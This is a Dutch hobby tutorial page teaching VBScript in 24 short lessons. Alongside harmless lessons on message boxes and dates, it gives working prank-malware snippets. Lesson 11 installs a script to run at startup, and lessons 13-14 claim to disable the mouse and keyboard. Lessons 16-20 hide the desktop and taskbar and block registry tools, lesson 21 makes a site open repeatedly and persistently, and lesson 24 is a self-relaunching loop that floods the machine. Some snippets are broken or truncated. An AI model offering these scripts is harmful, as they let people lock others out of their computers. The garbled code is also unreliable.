Home
Tutorials
Links
Downloads GastenboekVBS


In deze Tutorial ga je leren hoe je VBS Scripten maakt. Wij zijn nergens verantwoordelijk voor. Ik ga niet te veel zeggen dus laten we beginnen!

De lessen:

Les 1

Dit is het begin:


msgbox "bericht",0 + 0,"naam uitgever"


Op de plek van Bericht staat jouw bericht en op de plek waar staat naam uitgever staat de uitgever.

Je wil natuurlijk niet altijd de zelfde popup laten zien dus kun je op de plek waar nu 0 + 0 staat ook 1 van deze codes invullen:

4096 = een venster dat op de voorgrond blijft staan

64 = een uitroepteken

48 = een gele waarschuwingsdriehoek

32 = een vraagteken

16 = een rode cirkel met een kruis

0 = Niks

Les 2

In deze les ga je leren hoe je meer knoppen kunt laten zien dan alleen "ok". De functies werken alleen niet.

0 = hiermee geef je alleen de OK knop weer

1 = hiermee geef je de knoppen OK en Annuleren weer

2 = hiermee geef je de knoppen Afbreken, Opnieuw en Negeren weer

3 = hiermee geef je de knoppen Ja, Nee en Annuleren weer

4 = hiermee geef je de knoppen Ja en Nee weer

Les 3

In deze les ga je leren hoe je een datum invoert. Dat gaat zo:

msgbox "De datum is " & date & "."

Maar je wilt natuurlijk niet alleen maar de datum maar ook, bijvoorbeeld, de tijd of het jaar. Dit doe je zo:

Day = geeft de dag weer

Hour = geeft het uur weer

Minute = geeft de minuut weer

Month = geef de maand in een getal weer

MonthName = geeft de naam van de maand neer, wel in het Engels!

Now = geeft de datum en de tijd op je pc aan

Time = geeft de tijd in uren minuten en seconden aan

Weekday = geeft de dag van de week aan

WeekdayName = geeft de naam van de dag aan, wel in het Engels!

Year = geeft het jaar aan

Les 4

In deze les ga je leren hoe je de computer kunt laten piepen. Dit doe je zo:

Set oWS = WScript.CreateObject("WScript.Shell")

oWS.Run "%comspec% /c echo " & Chr(07), 0, True

Les 5

In deze les ga je leren hoe je een folder moet verwijderen:

' delete

Set fso = CreateObject("Scripting.FileSystemObject")

Set aFolder = fso.GetFolder("Het path")

aFolder.Delete

Les 6

In deze les ga je leren hoe je een folder moet maken. Dit doe je zo:

path = "C:\linux"

set filesys=CreateObject("Scripting.FileSystemObject")

If Not filesys.FolderExists(path) Then

Set folder = filesys.CreateFolder(path)

End If

Les 7

In deze les ga je leren hoe je een folder/bestand opent. Dit doe je zo:

Set WshShell = WScript.CreateObject ("WScript.Shell")

WshShell.Run ("C:\Windows")

Dit opent een map maar je kunt ook een bestand openen. Dat moet zo:

In deze les ga je leren hoe je een folder/bestand opent. Dit doe je zo:

Set WshShell = WScript.CreateObject ("WScript.Shell")

WshShell.Run ("notepad.exe")

Les 8

In deze les ga je leren hoe je een register waarde aanmaakt of wijzicht. Degene die wij nu laten zien is om menu start sneller/langzaamer te openen. Dit moet zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\

MenuShowDelay", "55"

Les 9

In deze les ga je leren hoe je de sendkeys moet gebruiken. Het is belangrijk dat als je dit script uitvoert dan je dan vooraan het script zet dat het kladblok moet openen. Het gaat als volgt:

WScript.Sleep 400

WshShell.SendKeys "Je tekst "

Les 10

In deze les ga je leren hoe je Windws laat afsluiten. Dit gaat zo:

Set OpSysSet = GetObject("winmgmts:{(Shutdown)}//./root/cimv2").ExecQuery("

select * from Win32_OperatingSystem where Primary=true")

for each OpSys in OpSysSet

OpSys.ShutDown()nex

Les 11

In deze les ga je leren hoe je je script in de opstartvolgorde van Windows zet. Dit moet zo:

Set Shl = CreateObject("Wscript.Shell")

Set fso = CreateObject("Scripting.FileSystemObject")

winfolder = fso.GetSpecialFolder(0)

Set vbsfile = fso.GetFile(WScript.ScriptFullName)

vbsfile.Copy winfolder & "je filenaam"

Shl.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Run\Start menu",winfolder & "je filenaam"

Les 12

In deze les ga je leren hoe je de naam van de computer verandert. Dit moet zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\

CurrentVersion\RegisteredOwner", "De naam hier"

Les 13

In deze les ga je er voor zorgt dat je de muis niet meer kunt bewegen. Dit moet zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Run\DisableMouse", "Rundll32.exe Mouse,Disable"

Les 14

In deze les ga je leren hoe je het toetsenbord uitschakelt. Dit moet zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\

CurrentVersion\Run\DisableKeyboard", "Rundll32.exe Keyboard,Disable"

Les 15

In deze les ga je leren hoe je de CD speler opent en gelijk weer sluit. Het sluiten kan alleen bij Desktops. Bij laptops gaat hij niet automatisch dicht. Het moet zo:

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

Les 16

In deze les ga je leren hoe je alle bureaubladpictogrammen kunt later verdwijnen. Dit moet zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoDesktop","1"

Les 17

In deze les ga je leren hoe je de knop uitvoeren uit het menu start haalt. Dit gaat zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoRun","1"

Les 18

In deze les ga je leren hoe je zorgt dat iemand geen wijzigingen in het register kan aanbrengen. Dit moet zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System\DisableRegistryTools","1"

Les 19

In deze les ga je leren hoe je de taakbalk kunt later verdwijnen. Di moet zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoSetTaskbar","1"

Les 20

In deze les ga je leren hoe je ervoor zorgt dat je geen rechtmuis knop meer kan doen. Dit gaat zo:

Set shl = CreateObject("Wscript.shell")

Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoViewContextMenu","1"

Les 21

In deze les ga leren hoe je om de zoveel tijd een website kunt opstarten Je moet deze file wel opslaan als starten.vbs. Dit is de input:

Wscript.Sleep 120000

Set shl = CreateObject("Wscript.shell")

shl.Run "http://www.tutor.coonen.org/"

Set Shl = CreateObject("Wscript.Shell")

Set fso = CreateObject("Scripting.FileSystemObject")

winfolder = fso.GetSpecialFolder(0)

Set vbsfile = fso.GetFile(WScript.ScriptFullName)

vbsfile.Copy winfolder & "starten.vbs"

Shl.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Start menu",winfolder & "starten.vbs"

Les 22

In deze les ga je leren hoe je de walpaper kunt veranderen. Dit moet zo:

sub main ()

dim keyWallpaper, Wallpaper

KeyWallpaper = "HKEY_CURRENT_USER\Control Panel\Desktop\wallpaper"

Wallpaper = "HIER JE WALLPAPER"

Set shl = CreateObject("Wscript.shell")

shl.RegWrite KeyWallpaper, Wallpaper

End sub

Les 23

In deze les ga je leren hoe je tekst heel vaak kunt spammen. Je moet op de plek van 10 kun je elk willekeurig aantal invullen. Het gaat als volgt:

Dim i

For i = 1 To 10

WScript.Echo i,"e keer"

Next

Les 24

In deze les ga je leren hoe je een opdracht eindeloos laat opstarten. Ik maak een voorbeeld van een script als je dit wil overnemen moet je de file opslaan als "EVBSS.vbs".

Set WshShell = WScript.CreateObject ("WScript.Shell")

Do

WshShell.Run ("EVBSS.vbs")

Loop

_________ to Max en Rick_________
_________ http://tutor.coonen.org/_________